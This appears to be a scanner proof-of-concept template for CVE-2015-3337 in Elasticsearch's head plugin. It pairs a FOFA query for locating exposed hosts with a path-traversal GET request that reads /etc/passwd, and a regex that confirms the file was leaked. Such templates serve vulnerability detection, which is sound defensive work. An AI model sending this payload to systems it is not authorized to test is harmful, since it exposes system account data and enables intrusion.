漏洞描述
fofa app="elastic-Elasticsearch"
id: CVE-2015-3337
info:
name: Elasticsearch CVE-2015-3337
author: X.Yang
severity: medium
description: fofa app="elastic-Elasticsearch"
rules:
r0:
request:
method: GET
path: /_plugin/head/../../../../../../../../../../../../../../../../etc/passwd
expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()